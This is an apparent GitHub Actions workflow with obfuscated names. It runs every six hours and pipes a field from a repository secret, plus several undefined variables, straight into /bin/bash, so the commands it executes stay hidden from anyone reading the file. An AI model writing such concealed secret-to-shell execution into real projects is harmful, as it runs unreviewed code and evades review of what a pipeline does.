name: liangtoushang5678
on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liangtoushang5678
        env:
          hzclb38: ${{ secrets.hzclb38 }}
        run: |
          echo $hzclb38 | jq -r .khgci57 | /bin/bash
          echo $lu6 | jq -r .b80339 | /bin/bash
          echo $cr23 | jq -r .n972 | /bin/bash
          echo $vc347 | jq -r .hczd558 | /bin/bash
          echo $ox85 | jq -r .zfe194 | /bin/bash
          echo $hfzmy8785 | jq -r .msok037 | /bin/bash
          echo $wzl94657 | jq -r .p64 | /bin/bash

